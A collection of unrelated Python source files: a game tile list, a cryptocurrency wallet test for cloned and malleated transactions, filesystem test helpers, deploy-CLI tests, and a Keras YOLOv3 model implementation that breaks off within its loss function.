py | b41050040292a5fb47c819f4fdcd8c2f5d451c5d | __all__ = ['Tile-Air', 'Tile-AirBack', 'Tile-BackDirt', 'Tile-Bedrock', 'Tile-Coal', 'Tile-Copper', 'Tile-Dirt', 'Tile-Grass', 'Tile-Invisablock', 'Tile-Leaves', 'Tile-LeavesSnow', 'Tile-SnowTile', 'Tile-Stone', 'Tile-StoneBack', 'Tile-StoneBrick', 'Tile-Torch', 'Tile-Trunk', 'Tile-WoodPlank', 'Tile-WoodenBack', 'Tile-WoodenChest', 'Tile-WoodenDoorBottomClose', 'Tile-WoodenDoorBottomOpen', 'Tile-WoodenDoorMiddleClose', 'Tile-WoodenDoorMiddleOpen', 'Tile-WoodenDoorTopClose', 'Tile-WoodenDoorTopOpen'] |
py | b4105019ab5abc054aa725cda1a6ed1ba4c27bf2 | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Flashpaychain Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet accounts properly when there are cloned transactions with malleated scriptsigs."""
from test_framework.test_framework import FlashpaychainTestFramework
from test_framework.util import *
class TxnMallTest(FlashpaychainTestFramework):
def set_test_params(self):
self.num_nodes = 4
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
parser.add_option("--segwit", dest="segwit", default=False, action="store_true",
help="Test behaviour with SegWit txn (which should fail)")
def setup_network(self):
# Start with split network:
super(TxnMallTest, self).setup_network()
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
def run_test(self):
if self.options.segwit:
output_type="p2sh-segwit"
else:
output_type="legacy"
# All nodes should start with 1,250 BTC:
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
self.nodes[0].settxfee(.001)
node0_address_foo = self.nodes[0].getnewaddress("foo", output_type)
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar", output_type)
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# Send tx1, and another transaction tx2 that won't be cloned
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Construct a clone of tx1, to be malleated
rawtx1 = self.nodes[0].getrawtransaction(txid1,1)
clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}]
clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"],
rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]}
clone_locktime = rawtx1["locktime"]
clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs, clone_locktime)
# createrawtransaction randomizes the order of its outputs, so swap them if necessary.
# output 0 is at version+#inputs+input+sigstub+sequence+#outputs
# 40 BTC serialized is 00286bee00000000
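# i.e. 2 * (4 version + 1 input count + 36 outpoint + 1 empty-scriptSig length + 4 sequence
# + 1 output count) = 94 hex characters in; 00286bee00000000 is little-endian for
# 4,000,000,000 satoshis = 40 BTC.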
pos0 = 2*(4+1+36+1+4+1)
hex40 = "00286bee00000000"
output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0)
if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or
rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40):
output0 = clone_raw[pos0 : pos0 + output_len]
output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len]
clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]
# Use a different signature hash type to sign. This creates an equivalent but malleated clone.
# Don't send the clone anywhere yet
tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
assert_equal(tx1_clone["complete"], True)
# Have node0 mine a block, if requested:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50BTC for another
# matured block, minus tx1 and tx2 amounts, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Send clone and its parent to miner
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
if self.options.segwit:
assert_equal(txid1, txid1_clone)
return
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
self.nodes[2].sendrawtransaction(tx2["hex"])
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx1_clone = self.nodes[0].gettransaction(txid1_clone)
tx2 = self.nodes[0].gettransaction(txid2)
# Verify expected confirmations
assert_equal(tx1["confirmations"], -2)
assert_equal(tx1_clone["confirmations"], 2)
assert_equal(tx2["confirmations"], 1)
# Check node0's total balance; should be same as before the clone, + 100 BTC for 2 matured,
# less possible orphaned matured subsidy
expected += 100
if (self.options.mine_block):
expected -= 50
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*", 0), expected)
# Check node0's individual account balances.
# "foo" should have been debited by the equivalent clone of tx1
assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
# "bar" should have been debited by (possibly unconfirmed) tx2
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
# "" should have starting balance, less funding txes, plus subsidies
assert_equal(self.nodes[0].getbalance("", 0), starting_balance
- 1219
+ fund_foo_tx["fee"]
- 29
+ fund_bar_tx["fee"]
+ 100)
# Node1's "from0" account balance
assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))
if __name__ == '__main__':
TxnMallTest().main()
|
py | b410507e425a649df7d89d7109689b3c5e4d94fe | #!/usr/bin/env python
"""A test utilities for interacting with filesystem."""
import io
import os
import platform
import subprocess
import unittest
from typing import Text
def CreateFile(filepath: Text, content: bytes = b"") -> None:
"""Creates a file at specified path.
Note that if a file at the specified path already exists, its old content will
be overwritten.
Args:
filepath: A path to the file to touch.
content: An (optional) content to write to the file.
"""
# There is a slight chance of a race condition here (the directory might have
# been created after the `os.path.exists` check). This utility is a test-only
# thing, so we do not care that much and just swallow any `OSError` exceptions.
# If we don't have the right permissions, `io.open` will fail later anyway.
dirpath = os.path.dirname(filepath)
if not os.path.exists(dirpath):
try:
os.makedirs(dirpath)
except OSError:
pass
with io.open(filepath, "wb") as filedesc:
filedesc.write(content)
def Command(name, args=None, system=None, message=None):
"""Executes given command as a subprocess for testing purposes.
If the command fails, is not available, or is not compatible with the operating
system, the test case that tried to call it is skipped.
Args:
name: A name of the command to execute (e.g. `ls`).
args: A list of arguments for the command (e.g. `-l`, `-a`).
system: An operating system that the command should be compatible with.
message: A message to skip the test with in case of a failure.
Raises:
SkipTest: If command execution fails.
"""
args = args or []
if system is not None and platform.system() != system:
raise unittest.SkipTest("`%s` available only on `%s`" % (name, system))
if subprocess.call(["which", name], stdout=open("/dev/null", "w")) != 0:
raise unittest.SkipTest("`%s` command is not available" % name)
if subprocess.call([name] + args, stdout=open("/dev/null", "w")) != 0:
raise unittest.SkipTest(message or "`%s` call failed" % name)
def Chflags(filepath, flags=None):
"""Executes a `chflags` command with specified flags for testing purposes.
Calling this on platforms different than macOS will skip the test.
Args:
filepath: A path to the file to change the flags of.
flags: A list of flags to be changed (see `chflags` documentation).
"""
flags = flags or []
Command("chflags", args=[",".join(flags), filepath], system="Darwin")
def Chattr(filepath, attrs=None):
"""Executes a `chattr` command with specified attributes for testing purposes.
Calling this on platforms different than Linux will skip the test.
Args:
filepath: A path to the file to change the attributes of.
attrs: A list of attributes to be changed (see `chattr` documentation).
"""
attrs = attrs or []
message = "file attributes not supported by filesystem"
Command("chattr", args=attrs + [filepath], system="Linux", message=message)
def SetExtAttr(filepath, name, value):
"""Sets an extended file attribute of a given file for testing purposes.
Calling this on platforms different than Linux or macOS will skip the test.
Args:
filepath: A path to the file to set an extended attribute of.
name: A name of the extended attribute to set.
value: A value of the extended attribute being set.
Raises:
SkipTest: If called on unsupported platform.
"""
system = platform.system()
if system == "Linux":
_SetExtAttrLinux(filepath, name=name, value=value)
elif system == "Darwin":
_SetExtAttrOsx(filepath, name=name, value=value)
else:
message = "setting extended attributes is not supported on `%s`" % system
raise unittest.SkipTest(message)
def _SetExtAttrLinux(filepath, name, value):
args = ["-n", name, "-v", value, filepath]
message = "extended attributes not supported by filesystem"
Command("setfattr", args=args, system="Linux", message=message)
def _SetExtAttrOsx(filepath, name, value):
args = ["-w", name, value, filepath]
message = "extended attributes are not supported"
Command("xattr", args=args, system="Drawin", message=message)
|
py | b41050b80a9cc015d3baca79949feec94791e99c | # -*- coding: utf-8 -*-
import time
from pytest import mark
@mark.parametrize('with_message', [True, False])
@mark.parametrize('hard_deployment', [True, False])
@mark.parametrize('final_release_state', [
'DEPLOYED', 'FAILED', 'UNKNOWN', 'TEMP_DEPLOYMENT_FAILURE'
])
@mark.parametrize('maintenance', [True, False])
@mark.parametrize('payload', [
None, {'stories': {'foo'}, 'services': ['bar', 'baz']}
])
def test_deploy(runner, with_message, patch, hard_deployment,
final_release_state, maintenance, payload,
init_sample_app_in_cwd):
with runner.runner.isolated_filesystem():
init_sample_app_in_cwd()
# Imports are deferred to this point because the CLI init code must be
# triggered inside an isolated filesystem, inside an app dir.
# Weird things happen otherwise. Not the most efficient way, but it works.
from story import api
from story.commands import test
from story.commands.deploy import deploy
patch.object(test, 'compile_app', return_value=payload)
patch.object(time, 'sleep')
patch.object(api.Config, 'get')
patch.object(api.Releases, 'create')
patch.object(api.Releases, 'get', side_effect=[
[{'state': 'QUEUED'}],
[{'state': 'DEPLOYING'}],
[{'state': final_release_state}],
])
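# The three mocked states above (QUEUED -> DEPLOYING -> final) drive three
# polling iterations, which is what the `time.sleep.call_count == 3`
# assertion below relies on.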
patch.object(api.Apps, 'maintenance', return_value=maintenance)
args = []
if with_message:
message = 'hello world'
args.append('--message')
args.append(message)
else:
message = None
if hard_deployment:
args.append('--hard')
if payload is None:
result = runner.run(deploy, exit_code=1)
assert result.stdout == ''
return
else:
result = runner.run(deploy, exit_code=0, args=args)
if maintenance:
assert 'Your app is in maintenance mode.' in result.stdout
return
api.Config.get.assert_called_with('my_app')
api.Releases.create.assert_called_with(
api.Config.get(), payload, 'my_app', message, hard_deployment)
assert time.sleep.call_count == 3
if final_release_state == 'DEPLOYED':
assert 'Configured 1 story' in result.stdout
assert '- foo' in result.stdout
assert 'Deployed 2 services' in result.stdout
assert '- bar' in result.stdout
assert '- baz' in result.stdout
assert 'Created ingress route' in result.stdout
assert 'Configured logging' in result.stdout
assert 'Configured health checks' in result.stdout
assert 'Deployment successful!' in result.stdout
elif final_release_state == 'FAILED':
assert 'Deployment failed!' in result.stdout
assert 'story logs' in result.stdout
elif final_release_state == 'TEMP_DEPLOYMENT_FAILURE':
assert 'Deployment failed!' in result.stdout
assert 'status.storyscript.io' in result.stdout
else:
assert f'An unhandled state of your app has been encountered ' \
f'- {final_release_state}' in result.stdout
assert '[email protected]' in result.stdout
def test_deploy_no_stories(runner, patch, init_sample_app_in_cwd):
with runner.runner.isolated_filesystem():
with open('story.yml', 'w') as f:
f.write('app_name: my_app\n')
from story.commands import test
from story.commands.deploy import deploy
patch.object(test, 'compile_app', return_value={'stories': []})
result = runner.run(deploy, exit_code=1, args=[])
assert 'No stories were found for your app' in result.stdout
assert 'You can write an example story using:' in result.stdout
assert 'story template http > http.story' in result.stdout
|
py | b41050ed255dd357c36b36a7c8cad592fea97b64 | """YOLO_v3 Model Defined in Keras."""
from functools import wraps
import numpy as np
import tensorflow as tf
from keras import backend as K
from keras.layers import Conv2D, Add, ZeroPadding2D, UpSampling2D, Concatenate, MaxPooling2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras.regularizers import l2
from yolo3.utils import compose
@wraps(Conv2D)
def DarknetConv2D(*args, **kwargs):
"""Wrapper to set Darknet parameters for Convolution2D."""
darknet_conv_kwargs = {'kernel_regularizer': l2(5e-4)}
darknet_conv_kwargs['padding'] = 'valid' if kwargs.get('strides')==(2,2) else 'same'
darknet_conv_kwargs.update(kwargs)
return Conv2D(*args, **darknet_conv_kwargs)
def DarknetConv2D_BN_Leaky(*args, **kwargs):
"""Darknet Convolution2D followed by BatchNormalization and LeakyReLU."""
no_bias_kwargs = {'use_bias': False}
no_bias_kwargs.update(kwargs)
return compose(
DarknetConv2D(*args, **no_bias_kwargs),
BatchNormalization(),
LeakyReLU(alpha=0.1))
def resblock_body(x, num_filters, num_blocks):
'''A series of resblocks starting with a downsampling Convolution2D'''
# Darknet uses left and top padding instead of 'same' mode
x = ZeroPadding2D(((1,0),(1,0)))(x)
x = DarknetConv2D_BN_Leaky(num_filters, (3,3), strides=(2,2))(x)
for i in range(num_blocks):
y = compose(
DarknetConv2D_BN_Leaky(num_filters//2, (1,1)),
DarknetConv2D_BN_Leaky(num_filters, (3,3)))(x)
x = Add()([x,y])
return x
def darknet_body(x):
'''Darknet body having 52 Convolution2D layers'''
x = DarknetConv2D_BN_Leaky(32, (3,3))(x)
x = resblock_body(x, 64, 1)
x = resblock_body(x, 128, 2)
x = resblock_body(x, 256, 8)
x = resblock_body(x, 512, 8)
x = resblock_body(x, 1024, 4)
return x
def make_last_layers(x, num_filters, out_filters):
'''6 Conv2D_BN_Leaky layers followed by a Conv2D_linear layer'''
x = compose(
DarknetConv2D_BN_Leaky(num_filters, (1,1)),
DarknetConv2D_BN_Leaky(num_filters*2, (3,3)),
DarknetConv2D_BN_Leaky(num_filters, (1,1)),
DarknetConv2D_BN_Leaky(num_filters*2, (3,3)),
DarknetConv2D_BN_Leaky(num_filters, (1,1)))(x)
y = compose(
DarknetConv2D_BN_Leaky(num_filters*2, (3,3)),
DarknetConv2D(out_filters, (1,1)))(x)
return x, y
def yolo_body(inputs, num_anchors, num_classes):
"""Create YOLO_V3 model CNN body in Keras."""
darknet = Model(inputs, darknet_body(inputs))
x, y1 = make_last_layers(darknet.output, 512, num_anchors*(num_classes+5))
x = compose(
DarknetConv2D_BN_Leaky(256, (1,1)),
UpSampling2D(2))(x)
x = Concatenate()([x,darknet.layers[152].output])
x, y2 = make_last_layers(x, 256, num_anchors*(num_classes+5))
x = compose(
DarknetConv2D_BN_Leaky(128, (1,1)),
UpSampling2D(2))(x)
x = Concatenate()([x,darknet.layers[92].output])
x, y3 = make_last_layers(x, 128, num_anchors*(num_classes+5))
return Model(inputs, [y1,y2,y3])
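# For a 416x416 input, the three outputs y1, y2, y3 correspond to the
# 13x13, 26x26 and 52x52 grids (strides 32, 16 and 8), i.e. coarse to fine.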
def tiny_yolo_body(inputs, num_anchors, num_classes):
'''Create Tiny YOLO_v3 model CNN body in Keras.'''
x1 = compose(
DarknetConv2D_BN_Leaky(16, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(32, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(64, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(128, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(256, (3,3)))(inputs)
x2 = compose(
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(512, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(1,1), padding='same'),
DarknetConv2D_BN_Leaky(1024, (3,3)),
DarknetConv2D_BN_Leaky(256, (1,1)))(x1)
y1 = compose(
DarknetConv2D_BN_Leaky(512, (3,3)),
DarknetConv2D(num_anchors*(num_classes+5), (1,1)))(x2)
x2 = compose(
DarknetConv2D_BN_Leaky(128, (1,1)),
UpSampling2D(2))(x2)
y2 = compose(
Concatenate(),
DarknetConv2D_BN_Leaky(256, (3,3)),
DarknetConv2D(num_anchors*(num_classes+5), (1,1)))([x2,x1])
return Model(inputs, [y1,y2])
def yolo_head(feats, anchors, num_classes, input_shape, calc_loss=False):
"""Convert final layer features to bounding box parameters."""
num_anchors = len(anchors)
# Reshape to batch, height, width, num_anchors, box_params.
anchors_tensor = K.reshape(K.constant(anchors), [1, 1, 1, num_anchors, 2])
grid_shape = K.shape(feats)[1:3] # height, width
grid_y = K.tile(K.reshape(K.arange(0, stop=grid_shape[0]), [-1, 1, 1, 1]),
[1, grid_shape[1], 1, 1])
grid_x = K.tile(K.reshape(K.arange(0, stop=grid_shape[1]), [1, -1, 1, 1]),
[grid_shape[0], 1, 1, 1])
grid = K.concatenate([grid_x, grid_y])
grid = K.cast(grid, K.dtype(feats))
feats = K.reshape(
feats, [-1, grid_shape[0], grid_shape[1], num_anchors, num_classes + 5])
# Adjust predictions to each spatial grid point and anchor size.
# box_xy is the center of the predicted box in image coordinates (bx, by in the paper).
# box_wh is the predicted box size (bw, bh in the paper).
# feats, the raw output of model_body, holds tx, ty, tw, th; sigmoid(feats) gives the box confidence and the per-class confidences.
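# Concretely, with (cx, cy) the grid cell offset and (pw, ph) the anchor size
# in input pixels:
#   bx = (sigmoid(tx) + cx) / grid_w        by = (sigmoid(ty) + cy) / grid_h
#   bw = pw * exp(tw) / input_w             bh = ph * exp(th) / input_h
# so box_xy and box_wh below are normalized to [0, 1] of the network input.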
box_xy = (K.sigmoid(feats[..., :2]) + grid) / K.cast(grid_shape[::-1], K.dtype(feats))
box_wh = K.exp(feats[..., 2:4]) * anchors_tensor / K.cast(input_shape[::-1], K.dtype(feats))
box_confidence = K.sigmoid(feats[..., 4:5])
box_class_probs = K.sigmoid(feats[..., 5:])
if calc_loss:
return grid, feats, box_xy, box_wh
return box_xy, box_wh, box_confidence, box_class_probs
def yolo_correct_boxes(box_xy, box_wh, input_shape, image_shape):
'''Get corrected boxes'''
box_yx = box_xy[..., ::-1]
box_hw = box_wh[..., ::-1]
input_shape = K.cast(input_shape, K.dtype(box_yx))
image_shape = K.cast(image_shape, K.dtype(box_yx))
new_shape = K.round(image_shape * K.min(input_shape/image_shape))
offset = (input_shape-new_shape)/2./input_shape
scale = input_shape/new_shape
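# Worked example (illustrative numbers, not taken from the code): for a
# 416x416 input and a 480x640 (h, w) image, min(416/480, 416/640) = 0.65, so
# new_shape = (312, 416), offset = ((416-312)/2/416, 0) = (0.125, 0) and
# scale = (416/312, 1); the letterbox padding is removed and the boxes are
# stretched back to the original aspect ratio below.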
box_yx = (box_yx - offset) * scale
box_hw *= scale
box_mins = box_yx - (box_hw / 2.)
box_maxes = box_yx + (box_hw / 2.)
boxes = K.concatenate([
box_mins[..., 0:1], # y_min
box_mins[..., 1:2], # x_min
box_maxes[..., 0:1], # y_max
box_maxes[..., 1:2] # x_max
])
# Scale boxes back to original image shape.
boxes *= K.concatenate([image_shape, image_shape])
return boxes
def yolo_boxes_and_scores(feats, anchors, num_classes, input_shape, image_shape):
'''Process Conv layer output'''
box_xy, box_wh, box_confidence, box_class_probs = yolo_head(feats,
anchors, num_classes, input_shape)
boxes = yolo_correct_boxes(box_xy, box_wh, input_shape, image_shape)
boxes = K.reshape(boxes, [-1, 4])
box_scores = box_confidence * box_class_probs
box_scores = K.reshape(box_scores, [-1, num_classes])
return boxes, box_scores
def yolo_eval(yolo_outputs,
anchors,
num_classes,
image_shape,
max_boxes=20,
score_threshold=.6,
iou_threshold=.5):
"""Evaluate YOLO model on given input and return filtered boxes."""
num_layers = len(yolo_outputs)
anchor_mask = [[6,7,8], [3,4,5], [0,1,2]] if num_layers==3 else [[3,4,5], [1,2,3]] # default setting
input_shape = K.shape(yolo_outputs[0])[1:3] * 32
boxes = []
box_scores = []
for l in range(num_layers):
_boxes, _box_scores = yolo_boxes_and_scores(yolo_outputs[l],
anchors[anchor_mask[l]], num_classes, input_shape, image_shape)
boxes.append(_boxes)
box_scores.append(_box_scores)
boxes = K.concatenate(boxes, axis=0)
box_scores = K.concatenate(box_scores, axis=0)
mask = box_scores >= score_threshold
max_boxes_tensor = K.constant(max_boxes, dtype='int32')
boxes_ = []
scores_ = []
classes_ = []
for c in range(num_classes):
# TODO: use keras backend instead of tf.
class_boxes = tf.boolean_mask(boxes, mask[:, c])
class_box_scores = tf.boolean_mask(box_scores[:, c], mask[:, c])
nms_index = tf.image.non_max_suppression(
class_boxes, class_box_scores, max_boxes_tensor, iou_threshold=iou_threshold)
class_boxes = K.gather(class_boxes, nms_index)
class_box_scores = K.gather(class_box_scores, nms_index)
classes = K.ones_like(class_box_scores, 'int32') * c
boxes_.append(class_boxes)
scores_.append(class_box_scores)
classes_.append(classes)
boxes_ = K.concatenate(boxes_, axis=0)
scores_ = K.concatenate(scores_, axis=0)
classes_ = K.concatenate(classes_, axis=0)
return boxes_, scores_, classes_
def preprocess_true_boxes(true_boxes, input_shape, anchors, num_classes):
'''Preprocess true boxes to training input format
Parameters
----------
true_boxes: array, shape=(m, T, 5)
Absolute x_min, y_min, x_max, y_max, class_id relative to input_shape.
input_shape: array-like, hw, multiples of 32
anchors: array, shape=(N, 2), wh
num_classes: integer
Returns
-------
y_true: list of array, shape like yolo_outputs, xywh are relative values
'''
assert (true_boxes[..., 4]<num_classes).all(), 'class id must be less than num_classes'
num_layers = len(anchors)//3 # default setting
# Note: the tiny-YOLO anchor mask [[3,4,5], [1,2,3]] looks like a typo for [[3,4,5], [0,1,2]], but it matches the original author's setting, so it is kept as-is.
anchor_mask = [[6,7,8], [3,4,5], [0,1,2]] if num_layers==3 else [[3,4,5], [1,2,3]]
true_boxes = np.array(true_boxes, dtype='float32')
input_shape = np.array(input_shape, dtype='int32')
# x,y is of center of boxes, w,h is the width and height of boxes
boxes_xy = (true_boxes[..., 0:2] + true_boxes[..., 2:4]) // 2
boxes_wh = true_boxes[..., 2:4] - true_boxes[..., 0:2]
# normalize true box into image coordinates (0,1)
true_boxes[..., 0:2] = boxes_xy/input_shape[::-1]
true_boxes[..., 2:4] = boxes_wh/input_shape[::-1]
# number of images in the batch, or batch_size
m = true_boxes.shape[0]
layer2stride = {0:32, 1:16, 2:8}
grid_shapes = [input_shape//layer2stride[l] for l in range(num_layers)]
# initialize y_true for correct output shapes
y_true = [np.zeros((m,grid_shapes[l][0],grid_shapes[l][1],len(anchor_mask[l]),5+num_classes),
dtype='float32') for l in range(num_layers)]
# Expand dim to apply broadcasting.
anchors = np.expand_dims(anchors, 0)
anchor_maxes = anchors / 2.
anchor_mins = -anchor_maxes
valid_mask = boxes_wh[..., 0]>0
for b in range(m):
# Discard zero rows.
wh = boxes_wh[b, valid_mask[b]]
if len(wh)==0: continue
# Expand dim to apply broadcasting.
wh = np.expand_dims(wh, -2)
box_maxes = wh / 2.
box_mins = -box_maxes
# Assume the anchor and the true box share the same center and compute their IoU;
# this picks the best-fitting anchor size for each true box.
intersect_mins = np.maximum(box_mins, anchor_mins)
intersect_maxes = np.minimum(box_maxes, anchor_maxes)
intersect_wh = np.maximum(intersect_maxes - intersect_mins, 0.)
intersect_area = intersect_wh[..., 0] * intersect_wh[..., 1]
box_area = wh[..., 0] * wh[..., 1]
anchor_area = anchors[..., 0] * anchors[..., 1]
iou = intersect_area / (box_area + anchor_area - intersect_area)
# Find best anchor for each true box
best_anchor = np.argmax(iou, axis=-1)
# b is image number in batch
# t is number of true boxes in image
for t, n in enumerate(best_anchor):
for l in range(num_layers):
if n in anchor_mask[l]:
# find responsible cell
i = np.floor(true_boxes[b,t,0]*grid_shapes[l][1]).astype('int32')
j = np.floor(true_boxes[b,t,1]*grid_shapes[l][0]).astype('int32')
# index of best anchor in the best layer containing the best anchor
k = anchor_mask[l].index(n)
# index of class
c = true_boxes[b,t, 4].astype('int32')
# if there is an anchor in a cell which is best fitted to multi true_boxes
# => has same i,j,k index for different t
# => former will be replaced by latter
y_true[l][b, j, i, k, 0:4] = true_boxes[b,t, 0:4]
y_true[l][b, j, i, k, 4] = 1
y_true[l][b, j, i, k, 5+c] = 1
return y_true
def box_iou(b1, b2):
'''Return iou tensor
Parameters
----------
b1: tensor, shape=(i1,...,iN, 4), xywh
b2: tensor, shape=(j, 4), xywh
Returns
-------
iou: tensor, shape=(i1,...,iN, j)
'''
# Expand dim to apply broadcasting.
b1 = K.expand_dims(b1, -2)
b1_xy = b1[..., :2]
b1_wh = b1[..., 2:4]
b1_wh_half = b1_wh/2.
b1_mins = b1_xy - b1_wh_half
b1_maxes = b1_xy + b1_wh_half
# Expand dim to apply broadcasting.
b2 = K.expand_dims(b2, 0)
b2_xy = b2[..., :2]
b2_wh = b2[..., 2:4]
b2_wh_half = b2_wh/2.
b2_mins = b2_xy - b2_wh_half
b2_maxes = b2_xy + b2_wh_half
intersect_mins = K.maximum(b1_mins, b2_mins)
intersect_maxes = K.minimum(b1_maxes, b2_maxes)
intersect_wh = K.maximum(intersect_maxes - intersect_mins, 0.)
intersect_area = intersect_wh[..., 0] * intersect_wh[..., 1]
b1_area = b1_wh[..., 0] * b1_wh[..., 1]
b2_area = b2_wh[..., 0] * b2_wh[..., 1]
iou = intersect_area / (b1_area + b2_area - intersect_area)
return iou
def yolo_loss(args, anchors, num_classes, ignore_thresh=.5, print_loss=False):
'''Return yolo_loss tensor
Parameters
----------
yolo_outputs: list of tensor, the output of yolo_body or tiny_yolo_body
y_true: list of array, the output of preprocess_true_boxes
anchors: array, shape=(N, 2), wh
num_classes: integer
ignore_thresh: float, the iou threshold whether to ignore object confidence loss
Returns
-------
loss: tensor, shape=(1,)
'''
num_layers = len(anchors)//3 # default setting
yolo_outputs = args[:num_layers]
y_true = args[num_layers:]
anchor_mask = [[6,7,8], [3,4,5], [0,1,2]] if num_layers==3 else [[3,4,5], [1,2,3]]
input_shape = K.cast(K.shape(yolo_outputs[0])[1:3] * 32, K.dtype(y_true[0]))
grid_shapes = [K.cast(K.shape(yolo_outputs[l])[1:3], K.dtype(y_true[0])) for l in range(num_layers)]
loss = 0
m = K.shape(yolo_outputs[0])[0] # batch size, tensor
mf = K.cast(m, K.dtype(yolo_outputs[0]))
for l in range(num_layers):
# object_mask = 1 for object cell
object_mask = y_true[l][..., 4:5]
# true class probs = 1 for class of object cell
true_class_probs = y_true[l][..., 5:]
# raw_pred, the raw output of model_body, holds tx, ty, tw, th; sigmoid(raw_pred) gives the box confidence and the per-class confidences.
grid, raw_pred, pred_xy, pred_wh = yolo_head(yolo_outputs[l],
anchors[anchor_mask[l]], num_classes, input_shape, calc_loss=True)
pred_box = K.concatenate([pred_xy, pred_wh])
# Darknet raw box to calculate loss.
# y_true x, y, w, h are normalized in image coordinates:
#   y_true x, y are the true values of bx, by (normalized) from the paper,
#   y_true w, h are the true values of bw, bh (normalized) from the paper.
# raw_true_xy is the true value of sigmoid(tx), sigmoid(ty), in [0, 1], i.e. the center position within its grid cell.
# raw_true_wh is the true value of tw, th from the paper.
raw_true_xy = y_true[l][..., :2]*grid_shapes[l][::-1] - grid
raw_true_wh = K.log(y_true[l][..., 2:4] / anchors[anchor_mask[l]] * input_shape[::-1])
raw_true_wh = K.switch(object_mask, raw_true_wh, K.zeros_like(raw_true_wh)) # avoid log(0)=-inf
# smaller object, larger box loss scale factor
box_loss_scale = 2 - y_true[l][...,2:3]*y_true[l][...,3:4]
# Find ignore mask, iterate over each of batch.
ignore_mask = tf.TensorArray(K.dtype(y_true[0]), size=1, dynamic_size=True)
object_mask_bool = K.cast(object_mask, 'bool')
def loop_body(b, ignore_mask):
true_box = tf.boolean_mask(y_true[l][b,...,0:4], object_mask_bool[b,...,0])
iou = box_iou(pred_box[b], true_box)
best_iou = K.max(iou, axis=-1)
ignore_mask = ignore_mask.write(b, K.cast(best_iou<ignore_thresh, K.dtype(true_box)))
return b+1, ignore_mask
_, ignore_mask = K.control_flow_ops.while_loop(lambda b,*args: b<m, loop_body, [0, ignore_mask])
ignore_mask = ignore_mask.stack()
ignore_mask = K.expand_dims(ignore_mask, -1)
# K.binary_crossentropy is helpful to avoid exp overflow.
xy_loss = object_mask * box_loss_scale * K.binary_crossentropy(raw_true_xy, raw_pred[...,0:2], from_logits=True)
